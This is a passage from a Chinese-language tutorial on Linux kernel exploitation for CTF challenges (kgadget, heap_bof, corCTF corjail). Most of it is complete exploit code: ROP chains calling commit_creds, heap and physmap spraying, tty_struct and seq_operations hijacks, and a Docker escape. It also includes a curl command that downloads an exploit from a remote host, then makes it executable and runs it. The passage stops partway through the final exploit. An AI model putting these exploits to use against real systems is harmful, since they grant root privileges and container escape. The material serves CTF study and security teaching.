    rop[it++] = pop_rdi_ret;
    rop[it++] = init_cred;
    rop[it++] = commit_creds;
    rop[it++] = swapgs_restore_regs_and_return_to_usermode + 0x16;
    rop[it++] = 0;
    rop[it++] = 0;
    rop[it++] = (size_t) get_shell;
    rop[it++] = user_cs;
    rop[it++] = user_rflags;
    rop[it++] = user_sp;
    rop[it++] = user_ss;
    puts("[*] Spraying physmap...");
    for (int i = 1; i < 30000; i++) {
        void *page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        memcpy(page, rop, page_size);
    }
}

int main() {
    rebase();
    save_status();
    physmap_spray();

    core_fd = open("/proc/core", O_RDWR);
    if (core_fd < 0) {
        puts("[-] Failed to open core.");
        exit(-1);
    }

    size_t canary = get_canary();
    printf("[*] canary: %p\n", canary);

    char buf[0x100];
    memset(buf, 'a', sizeof(buf));
    *(size_t *) &buf[64] = canary;
    *(size_t *) &buf[80] = add_rsp_0xe8_ret;

    core_write(buf, sizeof(buf));

    __asm__(
            "mov r15, pop_rsp_ret;"
            "mov r14, try_hit;"
            "mov r13, 0x3333333333333333;"
            "mov r12, 0x4444444444444444;"
            "mov rbp, 0x5555555555555555;"
            "mov rbx, 0x6666666666666666;"
            "mov r11, 0x7777777777777777;"
            "mov r10, 0x8888888888888888;"
            "mov r9, 0x9999999999999999;"
            "mov r8, 0xaaaaaaaaaaaaaaaa;"
            "mov rcx, 0xbbbbbbbbbbbbbbbb;"
            "mov rax, 16;"
            "mov rdx, 0xffffffffffff0058;"
            "mov rsi, 0x6677889A;"
            "mov rdi, core_fd;"
            "syscall;"
            );

    system("/bin/sh");

    return 0;
}

例题：MINI-LCTF2022 - kgadget

附件下载链接
主要漏洞点在 kgaget_ioctl 函数上。分析如下：

总之这个函数可以执行指定位置的代码。
不过根据输出他提示信息， pt_regs 中只有 r8 和 r9 寄存器可以使用，但是除去这两个寄存器和系统调用以及传参用掉的寄存器还有 r11 和 rcx 的值没有被覆盖。

为了探究原因，首先在系统调用前将寄存器赋值为特殊值。

然后在 entry_SYSCALL_64 函数处下一个条件端点。

运行测试程序成功断在了目标位置。

观察寄存器发现 rcx 和 r11 以经被写入其他值了。因此这两个寄存器实际上是无法利用的。

漏洞利用的手段比较巧妙。
首先在用户空间喷射大量下图所示的内存页。

由于栈迁移的 gadget 占了绝大多数，因此 ioctl 执行随便一个地址的 gadget 很大概率会将栈迁移到 pt_regs 结构体。
在 pt_regs 结构体中利用 r8 和 r9 两个寄存器将栈迁移到喷射内存的区域的某个地址，很大概率会迁移到 add rsp; ret; 和 ret; gadget 处，很大概率会最终执行到 rop 完成提权。

返回用户空间在使用 swapgs_restore_regs_and_return_to_usermode 函数时应该注意，前面 pop 完寄存器之后除 iretq 需要的寄存器还剩 orig_rax 和 rdi ，为了缩短 rop 的长度，可以直接 retn 到标记的位置，不过 rop 接下来还要有 16 字节的填充来表示 orig_rax 和 rdi 的位置。

exp 如下：

#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

const size_t try_hit = 0xffff888000000000 + 0x7000000;
size_t user_cs, user_rflags, user_sp, user_ss;
size_t page_size;
int dev_fd;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
    );
    puts("[*]status has been saved.");
}

void get_shell() { system("/bin/sh"); }

int main() {
    save_status();
    dev_fd = open("/dev/kgadget", O_RDWR);
    if (dev_fd < 0) {
        puts("[-] Error: open kgadget");
    }
    page_size = sysconf(_SC_PAGESIZE);
    size_t *rop = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    int idx = 0;
    while (idx < (page_size / 8 - 0x30)) {
        rop[idx++] = 0xffffffff810737fe;// add rsp, 0xa0; pop rbx; pop r12; pop r13; pop rbp; ret;
    }
    for (; idx < (page_size / 8 - 11); idx++) {
        rop[idx] = 0xffffffff8108c6f1;// ret;
    }
    rop[idx++] = 0xffffffff8108c6f0;// pop rdi; ret;
    rop[idx++] = 0xffffffff82a6b700;// init_cred
    rop[idx++] = 0xffffffff810c92e0;// commit_creds
    rop[idx++] = 0xffffffff81c00fb0 + 27;// swapgs_restore_regs_and_return_to_usermode + 27;
    rop[idx++] = 0x0000000000000000;// padding
    rop[idx++] = 0x0000000000000000;// padding
    rop[idx++] = (size_t) get_shell;
    rop[idx++] = user_cs;
    rop[idx++] = user_rflags;
    rop[idx++] = user_sp;
    rop[idx++] = user_ss;
    puts("[*] Spraying physmap...");
    for (int i = 1; i < 15000; i++) {
        sigset_t *page = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        memcpy(page, rop, page_size);
    }
    puts("[*] trigger physmap one_gadget...");
    __asm__(
    "mov r15,   0xbeefdead;"
    "mov r14,   0x11111111;"
    "mov r13,   0x22222222;"
    "mov r12,   0x33333333;"
    "mov rbp,   0x44444444;"
    "mov rbx,   0x55555555;"
    "mov r11,   0x66666666;"
    "mov r10,   0x77777777;"
    "mov r9,    0xffffffff811483d0;"// pop rsp; ret;
    "mov r8,    try_hit;"
    "mov rax,   0x10;"
    "mov rcx,   0xaaaaaaaa;"
    "mov rdx,   try_hit;"
    "mov rsi,   0x1bf52;"
    "mov rdi,   dev_fd;"
    "syscall"
    );
    return 0;
}

Kernel Heap Exploit

这里以例题 heap bof 为例进行讲解。

heap bof 源码如下，存在 uaf 和堆溢出两种漏洞。

struct param {
    size_t len;       // 内容长度
    char *buf;        // 用户态缓冲区地址
    unsigned long idx;// 表示 ptr 数组的 索引
};

long bof_ioctl(struct file *filp, unsigned int cmd, unsigned long arg) {
    struct param p_arg;
    copy_from_user(&p_arg, (void *) arg, sizeof(struct param));
    long retval = 0;
    switch (cmd) {
        case 9:
            copy_to_user(p_arg.buf, ptr[p_arg.idx], p_arg.len);
            printk("copy_to_user: 0x%lx\n", *(long *) ptr[p_arg.idx]);
            break;
        case 8:
            copy_from_user(ptr[p_arg.idx], p_arg.buf, p_arg.len);
            break;
        case 7:
            kfree(ptr[p_arg.idx]);
            printk("free: 0x%p\n", ptr[p_arg.idx]);
            break;
        case 5:
            ptr[p_arg.idx] = kmalloc(p_arg.len, GFP_KERNEL);
            printk("alloc: 0x%p, size: %2lx\n", ptr[p_arg.idx], p_arg.len);
            break;
        default:
            retval = -1;
            break;
    }
    return retval;
}

Use After Free

修改 cred

cred 结构体大小为 0xa8 ，根据 slub 分配机制，如果申请和释放大小为 0xa8（实际为 0xe0 ）的内存块，此时再开一个线程，则该线程的 cred 结构题正是刚才释放掉的内存块。利用 UAF 漏洞修改 cred 就可以实现提权。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sys/wait.h>

struct param {
    size_t len;       // 内容长度
    char *buf;        // 用户态缓冲区地址
    unsigned long idx;// 表示 ptr 数组的 索引
};

int main() {
    int fd = open("dev/bof", O_RDWR);
    struct param p = {0xa8, malloc(0xa8), 1};
    ioctl(fd, 5, &p);//malloc
    ioctl(fd, 7, &p);//free
    int pid = fork();
    if (pid < 0) {
        puts("[-]fork error");
        return -1;
    }
    if (pid == 0) {
        p.buf = malloc(p.len = 0x30);
        memset(p.buf, 0, p.len);
        ioctl(fd, 8, &p);//edit
        if (getuid() == 0) {
            puts("[+]root success");
            system("/bin/sh");
        } else {
            puts("[-]root failed");
        }
    } else {
        wait(NULL);
    }
    close(fd);
    return 0;
}

但是此种方法在较新版本 kernel 中已不可行，我们已无法直接分配到 cred_jar 中的 object，这是因为 cred_jar 在创建时设置了 SLAB_ACCOUNT 标记，在 CONFIG_MEMCG_KMEM=y 时（默认开启）cred_jar 不会再与相同大小的 kmalloc-192 进行合并

来着内核源码 4.5 kernel/cred.c

void __init cred_init(void)
{
	/* allocate a slab in which we can store credentials */
	cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred), 0,
			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, NULL);
}

本题（4.4.72）：

void __init cred_init(void)
{
	/* allocate a slab in which we can store credentials */
	cred_jar = kmem_cache_create("cred_jar", sizeof(struct cred),
				     0, SLAB_HWCACHE_ALIGN|SLAB_PANIC, NULL);
}

利用 tty_struct 劫持程序控制流提权

在 /dev 下有一个伪终端设备 ptmx ，在我们打开这个设备时内核中会创建一个 tty_struct 结构体，与其他类型设备相同，tty 驱动设备中同样存在着一个存放着函数指针的结构体 tty_operations 。

使用 tty 设备的前提是挂载了 ptmx 设备。

1
2
3

mkdir /dev/pts
mount -t devpts none /dev/pts
chmod 777 /dev/ptmx

tty 的结构体 tty_srtuct 定义在 linux/tty.h 中。其中 ops 项（64bit 下位于结构体偏移 0x18 处）指向一个存放 tty 相关操作函数的函数指针的结构体 tty_operations 。

struct tty_operations {
    ...
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
    ...
};

struct tty_struct {
    ...
	const struct tty_operations *ops;
	...
}

因此我们只需要像上一种方法那样利用 UAF 修改 tty_struct 的结构体指针 ops （这里不直接劫持 tty_operations 的原因是 tty_operations 已经实例化的，不是动态申请的，类似 glibc 中的 _IO_XX_jumps ）然后再调用 tty 的相关操作函数就可以劫持控制流，实现我们想要的操作。
然而如果仅仅是靠修改 tty_operations 结构体中某函数指针只能写入一个 gadget ，除了使用 pt_regs + ret2dir 外还有下面这种方法。

这里需要利用通过 tty_struct 执行 ioctl 时的特性。

首先由于 tty_struct 指向的 tty_operations 已经实例化，因此可以通过 tty_struct 的 tty_operations 泄露内核基址。

通过 tty_struct 执行 ioctl 时， rax 的值正好是 rip 的值，也就是 tty_operations 中 ioctl 函数指针指向的指令的地址。

如果向 ioctl 函数指针写入 xchg eax,esp;ret 指令地址，则会将 rsp 的值置为 rax & 0xffffffff ，即将栈迁移至 rax & 0xffffffff 地址处。如果我们提前在 rax & 0xffffffff 地址处布置好 rop 则可以完成提权操作。

这里需要注意的是：

mmap 的内存不应该从 rax & 0xffffffff 开始，因为在执行 rop 时返回到用户空间执行 get_root 函数会抬高 rsp 小于 rax & 0xffffffff 造成越界，因此需要加一个偏移。
1
void *mmap_addr = mmap(mmap_base - 0x1000, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
mmap 的内存是没有映射到实际物理内存的虚拟内存，如果 rsp 到达没有写入 rop 的位置同样也会导致越界错误，因此在使用前先写入数据使其映射到物理内存上。
1
memset(mmap_addr, 0, 0x30000);
由于 ROP 在用户空间，因此不能过 SMAP 保护。

#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

size_t pop_rdi_ret = 0xffffffff8135ce9d;
size_t mov_cr4_rdi_pop_rbp_ret = 0xffffffff81004c10;
size_t swapgs_pop_rbp_ret = 0xffffffff810601f4;
size_t iretq = 0xffffffff810463cc;
size_t xchg_eax_esp_ret = 0xffffffff8100008a;

struct tty_operations {
    struct tty_struct *(*lookup)(struct tty_driver *driver, struct file *filp, int idx);

    int (*install)(struct tty_driver *driver, struct tty_struct *tty);

    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);

    int (*open)(struct tty_struct *tty, struct file *filp);

    void (*close)(struct tty_struct *tty, struct file *filp);

    void (*shutdown)(struct tty_struct *tty);

    void (*cleanup)(struct tty_struct *tty);

    int (*write)(struct tty_struct *tty, const unsigned char *buf, int count);

    int (*put_char)(struct tty_struct *tty, unsigned char ch);

    void (*flush_chars)(struct tty_struct *tty);

    int (*write_room)(struct tty_struct *tty);

    int (*chars_in_buffer)(struct tty_struct *tty);

    int (*ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    long (*compat_ioctl)(struct tty_struct *tty, unsigned int cmd, unsigned long arg);

    void (*set_termios)(struct tty_struct *tty, struct ktermios *old);

    void (*throttle)(struct tty_struct *tty);

    void (*unthrottle)(struct tty_struct *tty);

    void (*stop)(struct tty_struct *tty);

    void (*start)(struct tty_struct *tty);

    void (*hangup)(struct tty_struct *tty);

    int (*break_ctl)(struct tty_struct *tty, int state);

    void (*flush_buffer)(struct tty_struct *tty);

    void (*set_ldisc)(struct tty_struct *tty);

    void (*wait_until_sent)(struct tty_struct *tty, int timeout);

    void (*send_xchar)(struct tty_struct *tty, char ch);

    int (*tiocmget)(struct tty_struct *tty);

    int (*tiocmset)(struct tty_struct *tty, unsigned int set, unsigned int clear);

    int (*resize)(struct tty_struct *tty, struct winsize *ws);

    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);

    int (*get_icount)(struct tty_struct *tty, struct serial_icounter_struct *icount);

    const struct file_operations *proc_fops;
};

struct param {
    size_t len;
    char *buf;
    long long idx;
};
#define KERNCALL __attribute__((regparm(3)))

void *(*prepare_kernel_cred)(void *)KERNCALL =(void *) 0xffffffff8109f2b0;

void *(*commit_creds)(void *)KERNCALL =(void *) 0xffffffff8109ef00;

void get_shell() { system("/bin/sh"); }

void get_root() { commit_creds(prepare_kernel_cred(0)); }

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    puts("[*] status has been saved.");
}

#define __USE_GNU

#include <sched.h>

void bind_cpu(int core) {
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
}

const int BOF_NUM = 40;
const int PTMX_NUM = 0x100;

int main() {
    bind_cpu(sched_getcpu());

    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd == -1) {
        puts("[-] open bof device failed!");
        return -1;
    }

    struct param p;
    p.buf = malloc(p.len = 0x2e0);

    // 让驱动分配 BOF_NUM 个 0x2e0  的内存块
    for (p.idx = BOF_NUM - 1; p.idx >= 0; p.idx--) {
        ioctl(bof_fd, 5, &p); // malloc
    }

    // 释放 BOF_NUM 个申请的内存块
    for (p.idx = BOF_NUM - 1; p.idx >= 0; p.idx--) {
        ioctl(bof_fd, 7, &p);  // free
    }

    // 批量 open /dev/ptmx, 喷射 tty_struct
    int ptmx_fds[PTMX_NUM];
    for (int i = 0; i < PTMX_NUM; ++i) {
        ptmx_fds[i] = open("/dev/ptmx", O_RDWR | O_NOCTTY);
        if (ptmx_fds[i] == -1) {
            puts("[-] open ptmx err");
        }
    }

    p.idx = 0;
    ioctl(bof_fd, 9, &p);
    // 此时如果释放后的内存被 tty_struct 占用，那么他的开始字节序列应该为 1 54  0  0  1  0  0  0  0  0  0  0  0  0  0  0
    for (int i = 0; i < 16; ++i) {
        printf("%2x%c", p.buf[i], i == 15 ? '\n' : ' ');
    }

    // 利用 tty_operations 指针泄露内核基址
    size_t offset = (*(size_t *) &p.buf[0x18]) - 0xffffffff81a87940;
    printf("[*] offset: %p\n", offset);
    commit_creds = (void *) ((size_t) commit_creds + offset);
    prepare_kernel_cred = (void *) ((size_t) prepare_kernel_cred + offset);
    pop_rdi_ret += offset;
    mov_cr4_rdi_pop_rbp_ret += offset;
    swapgs_pop_rbp_ret += offset;
    iretq += offset;
    xchg_eax_esp_ret += offset;

    // 伪造 tty_operations 结构体
    struct tty_operations *fake_tty_operations = (struct tty_operations *) malloc(sizeof(struct tty_operations));
    memset(fake_tty_operations, 0, sizeof(struct tty_operations));
    fake_tty_operations->ioctl = (void *) xchg_eax_esp_ret;
    fake_tty_operations->close = (void *) xchg_eax_esp_ret;

    // 布局 rop 链
    save_status();
    size_t rop_chain[] = {
            pop_rdi_ret,
            0x6f0,
            mov_cr4_rdi_pop_rbp_ret,
            0,
            (size_t) get_root,
            swapgs_pop_rbp_ret,
            0,//padding
            iretq,
            (size_t) get_shell,
            user_cs,
            user_rflags,
            user_sp,
            user_ss
    };

    // 触发漏洞前先把 rop 链拷贝到 mmap_base
    void *mmap_base = (void *) (xchg_eax_esp_ret & 0xffffffff);
    void *mmap_addr = mmap(mmap_base - 0x1000, 0x30000, 7, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    printf("[*] mmap_addr: %p\n", mmap_addr);
    memset(mmap_addr, 0, 0x30000);
    memcpy(mmap_base, rop_chain, sizeof(rop_chain));

    // 批量修改 tty_struct 的 ops 指针
    *(size_t *) &p.buf[0x18] = (size_t) fake_tty_operations;
    for (p.idx = 0; p.idx < BOF_NUM; p.idx++) {
        ioctl(bof_fd, 8, &p);
    }

    // 调用 tty_operations.ioctl 和 tty_operations.close 触发漏洞
    for (int i = 0; i < PTMX_NUM; ++i) {
        ioctl(ptmx_fds[i], 0, 0);
        close(ptmx_fds[i]);
    }

    return 0;
}

Heap Overflow

修改 cred

溢出修改 cred ，和前面 UAF 修改 cred 一样，在新版本失效。

#include <stdio.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/wait.h>

struct param {
    size_t len;    // 内容长度
    char *buf;     // 用户态缓冲区地址
    long long idx; // 表示 ptr 数组的 索引
};

const int BOF_NUM = 10;

int main(void) {
    int bof_fd = open("/dev/bof", O_RDWR);
    if (bof_fd == -1) {
        puts("[-] Failed to open bof device.");
        exit(-1);
    }

    struct param p = {0xa8, malloc(0xa8), 0};
    // 让驱动分配 80 个 0xa8  的内存块
    for (int i = 0; i < 80; i++) {
        ioctl(bof_fd, 5, &p);  // malloc
    }
    puts("[*] clear heap done");

    // 让驱动分配 10 个 0xa8  的内存块
    for (p.idx = 0; p.idx < BOF_NUM; p.idx++) {
        ioctl(bof_fd, 5, &p);  // malloc
    }
    p.idx = 5;
    ioctl(bof_fd, 7, &p); // free

    // 调用 fork 分配一个 cred结构体
    int pid = fork();
    if (pid < 0) {
        puts("[-] fork error");
        exit(-1);
    }

    // 此时 ptr[4] 和 cred相邻
    // 溢出 修改 cred 实现提权
    p.idx = 4, p.len = 0xc0 + 0x30;
    memset(p.buf, 0, p.len);
    ioctl(bof_fd, 8, &p);
    if (!pid) {
        //一直到egid及其之前的都变为了0，这个时候就已经会被认为是root了
        size_t uid = getuid();
        printf("[*] uid: %zx\n", uid);
        if (!uid) {
            puts("[+] root success");
            // 权限修改完毕，启动一个shell，就是root的shell了
            system("/bin/sh");
        } else {
            puts("[-] root fail");
        }
    } else {
        wait(0);
    }
    return 0;
}

堆溢出 + 堆喷射覆写 seq_operations 控制内核执行流

原题为 InCTF2021 - Kqueue ，这里简化分析过程用 heap_bof 代替。

seq_operations 结构如下，该结构在打开 /proc/self/stat 时从 kmalloc-32 中分配。

struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};

在调用读取 stat 文件时会调用 seq_operations 的 start 函数指针。

ssize_t seq_read(struct file *file, char __user *buf, size_t size, loff_t *ppos)
{
	struct seq_file *m = file->private_data;
	...
	p = m->op->start(m, &pos);
	...

当我们在 heap_bof 驱动分配 0x20 大小的 object 后打开大量的 stat 文件就有很大概率在 heap_bof 分配的 object 的溢出范围内存在 seq_operations 结构体。

由于这道题关闭了 SMEP，SMAP 和 KPTI 保护，因此我们可以覆盖 start 函数指针为用户空间的提权代码实现提权。

至于 KASLR 可以通过泄露栈上的数据绕过。

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <unistd.h>

struct param {
    size_t len;       // 内容长度
    char *buf;        // 用户态缓冲区地址
    long long idx;// 表示 ptr 数组的 索引
};

const int SEQ_NUM = 0x200;
const int DATA_SIZE = 0x20 * 8;

void get_shell() { system("/bin/sh"); }

size_t user_cs, user_rflags, user_sp, user_ss, user_rip = (size_t) get_shell;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

#define KERNCALL __attribute__((regparm(3)))

void *(*commit_creds)(void *) KERNCALL = (void *) 0xFFFFFFFF810A1340;

void *init_cred = (void *) 0xFFFFFFFF81E496C0;

size_t kernel_offset;

void get_root() {
    __asm__(
            "mov rax, [rsp + 8];"
            "mov kernel_offset, rax;"
            );
    kernel_offset -= 0xffffffff81229378;
    commit_creds = (void *) ((size_t) commit_creds + kernel_offset);
    init_cred = (void *) ((size_t) init_cred + kernel_offset);
    commit_creds(init_cred);
    __asm__(
            "swapgs;"
            "push user_ss;"
            "push user_sp;"
            "push user_rflags;"
            "push user_cs;"
            "push user_rip;"
            "iretq;"
            );
}

int main() {
    int bof_fd = open("dev/bof", O_RDWR);
    if (bof_fd < 0) {
        puts("[-] Failed to open bof.");
        exit(-1);
    }
    struct param p = {0x20, malloc(0x20), 0};
    for (int i = 0; i < 0x40; i++) {
        ioctl(bof_fd, 5, &p);
    }

    int seq_fd[SEQ_NUM];
    for (int i = 0; i < SEQ_NUM; i++) {
        seq_fd[i] = open("/proc/self/stat", O_RDONLY);
        if (seq_fd[i] < 0) {
            puts("[-] Failed to open stat.");
        }
    }
    puts("[*] seq_operations spray finished.");

    p.len = DATA_SIZE;
    p.buf = malloc(DATA_SIZE);
    p.idx = 0;
    for (int i = 0; i < DATA_SIZE; i += sizeof(size_t)) {
        *(size_t *) &p.buf[i] = (size_t) get_root;
    }
    ioctl(bof_fd, 8, &p);
    puts("[*] Heap overflow finished.");

    save_status();
    for (int i = 0; i < SEQ_NUM; i++) {
        read(seq_fd[i], p.buf, 1);
    }

    return 0;
}

Off By Null

例题：corCTF2022 corjail（kmalloc-4k）

这里以 corCTF 2022 corjail 为例进行讲解。

题目驱动存在 0x1000 大小 object 的 off by one 漏洞。

v7 = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 0xA20LL, 0x1000LL);
printk("\x016[CoRMon::Debug] Syscalls @ %#llx\n", v7);
if ( v7 )
{
  _check_object_size(v7, v5, 0LL);
  if ( copy_from_user(v7, a2, v5) )
  {
    printk("\x013[CoRMon::Error] copy_from_user() call failed!\n");
    return -14LL;
  }
  else
  {
    v7[v5] = 0;
    if ( (unsigned int)update_filter(v7) )
    {
      kfree(v7);
      return -22LL;
    }
    else
    {
      kfree(v7);
      return a3;
    }
  }

首先喷射大量 0x20 大小的 user_key_payload 和下图所示 0x1000 + 0x20 的 poll_list 。

此时内存中 object 的分布如下图所示，其中黄色的是 user_key_payload ，绿色的是 poll_list ，白色是空闲 object 。

通过 off by null 修改 0x1000 大小的 poll_list ，使得指向 0x20 大小 poll_list 的 next 指针指向 user_key_payload 。

之后释放所有的 poll_list 结构，被 next 指向的的 user_key_payload 也被释放，形成 UAF 。注意，为了确保释放 poll_list 不出错，要保证 0x20 大小的 poll_list 的 next 指针为 NULL 。也就是 user_key_payload 的前 8 字节为 NULL 。由于 user_key_payload 的前 8 字节没有初始化，因此可以在申请 user_key_payload 前先用 setxattr 把前 8 字节置为 NULL 。另外实测 kmalloc-32 的 freelist 偏移为 16 字节，不会覆盖 next 指针。

喷射 seq_operations 利用 seq_operations->next 的低四字节覆盖 user_key_payload->datalen 为 0x4370 实现 user_key_payload 越界读， user_key_payload->data 前 8 字节被覆盖为 seq_operations->show ，可以泄露内核基址。另外可以根据是否越界读判断该 user_key_payload 是否被 seq_operations 覆盖。

之后释放不能越界读的 user_key_payload 并喷射 tty_file_private 填充产生的空闲 object 。之后再次越界读泄露 tty_file_private->tty 指向的 tty_struct ，我们定义这个地址为 target_object 。

释放 seq_operations 喷射 0x20 大小的 poll_list 。在 poll_list 被释放前，释放劫持的 user_key_payload ，利用 setxattr 修改 poll_list 的 next 指针指向 target_object - 0x18 。为了实现 setxattr 的喷射效果，setxattr 修改过的 object 通过申请 user_key_payload 劫持，确保下次 setxattr 修改的是另外的 object 。

趁 poll_list 还没有释放，释放 tty_struct 并申请 pipe_buffer ，将 target_object 替换为 pipe_buffer 。

之后 poll_list 释放导致 target_object - 0x18 区域释放。我们可以申请一个 0x400 大小的 user_key_payload 劫持 target_object - 0x18 ，从而劫持 pipe_buffer 实现控制流劫持。

本题除了内核提权外还需要 Docket 逃逸，具体实现为修改 task_struct 的 fs 指向 init_fs 。

// commit_creds(&init_creds)
*rop++ = pop_rdi_ret;
*rop++ = init_cred;
*rop++ = commit_creds;

// current = find_task_by_vpid(getpid())
*rop++ = pop_rdi_ret;
*rop++ = getpid();
*rop++ = find_task_by_vpid;

// current->fs = &init_fs
*rop++ = pop_rcx_ret;
*rop++ = 0x6e0;
*rop++ = add_rax_rcx_ret;
*rop++ = pop_rbx_ret;
*rop++ = init_fs;
*rop++ = mov_mmrax_rbx_pop_rbx_ret;
rop++;

利用不是很稳定，不过多次尝试还是能打通的。

由于题目环境存在 curl 命令，因此可以在题目所在文件夹下创建 web 服务。

1	python -m SimpleHTTPServer 8000

然后利用 curl 下载 exp 并执行。

1	curl 192.168.64.149:8000/exp -o /tmp/exp && chmod +x /tmp/exp && /tmp/exp

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <asm/ldt.h>
#include <assert.h>
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/keyctl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <pthread.h>
#include <sched.h>
#include <semaphore.h>
#include <signal.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/msg.h>
#include <sys/prctl.h>
#include <sys/sem.h>
#include <sys/shm.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/xattr.h>
#include <unistd.h>
#include <sys/sysinfo.h>

#define PAGE_SIZE 0x1000

int randint(int min, int max) {
    return min + (rand() % (max - min));
}

void bind_core(bool fixed, bool thread) {
    cpu_set_t cpu_set;
    CPU_ZERO(&cpu_set);
    CPU_SET(fixed ? 0 : randint(1, get_nprocs()), &cpu_set);
    if (thread) {
        pthread_setaffinity_np(pthread_self(), sizeof(cpu_set), &cpu_set);
    } else {
        sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
    }
}

void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

bool is_kernel_text_addr(size_t addr) {
    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFFFEFFFFFF;
//    return addr >= 0xFFFFFFFF80000000 && addr <= 0xFFFFFFFF9FFFFFFF;
}

bool is_dir_mapping_addr(size_t addr) {
    return addr >= 0xFFFF888000000000 && addr <= 0xFFFFc87FFFFFFFFF;
}

#define INVALID_KERNEL_OFFSET 0x1145141919810

const size_t kernel_addr_list[] = {
        0xffffffff813275c0,
        0xffffffff812d4320,
        0xffffffff812d4340,
        0xffffffff812d4330
};

size_t kernel_offset_query(size_t kernel_text_leak) {
    if (!is_kernel_text_addr(kernel_text_leak)) {
        return INVALID_KERNEL_OFFSET;
    }
    for (int i = 0; i < sizeof(kernel_addr_list) / sizeof(kernel_addr_list[0]); i++) {
        if (!((kernel_text_leak ^ kernel_addr_list[i]) & 0xFFF) && (kernel_text_leak - kernel_addr_list[i]) % 0x100000 == 0) {
            return kernel_text_leak - kernel_addr_list[i];
        }
    }
    printf("[-] unknown kernel addr: %#lx\n", kernel_text_leak);
    return INVALID_KERNEL_OFFSET;
}

size_t search_kernel_offset(void *buf, int len) {
    size_t *search_buf = buf;
    for (int i = 0; i < len / 8; i++) {
        size_t kernel_offset = kernel_offset_query(search_buf[i]);
        if (kernel_offset != INVALID_KERNEL_OFFSET) {
            printf("[+] kernel leak addr: %#lx\n", search_buf[i]);
            printf("[+] kernel offset: %#lx\n", kernel_offset);
            return kernel_offset;
        }
    }
    return INVALID_KERNEL_OFFSET;
}

size_t user_cs, user_rflags, user_sp, user_ss;

void save_status() {
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;");
    puts("[*] status has been saved.");
}

typedef struct {
    int nfds, timer;
} poll_args;

struct poll_list {
    struct poll_list *next;
    int len;
    struct pollfd entries[];
};

pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
size_t poll_threads, poll_cnt;

void *alloc_poll_list(void *args) {
    int nfds = ((poll_args *) args)->nfds;
    int timer = ((poll_args *) args)->timer;

    struct pollfd *pfds = calloc(nfds, sizeof(struct pollfd));
    for (int i = 0; i < nfds; i++) {
        pfds[i].fd = open("/etc/passwd", O_RDONLY);
        pfds[i].events = POLLERR;
    }

    bind_core(true, true);

    pthread_mutex_lock(&mutex);
    poll_threads++;
    pthread_mutex_unlock(&mutex);
    poll(pfds, nfds, timer);

    bind_core(false, true);

    pthread_mutex_lock(&mutex);
    poll_threads--;
    pthread_mutex_unlock(&mutex);
}

#define N_STACK_PPS 30
#define POLL_NUM 0x1000

pthread_t poll_tid[POLL_NUM];

void create_poll_thread(size_t size, int timer) {
    poll_args *args = calloc(1, sizeof(poll_args));
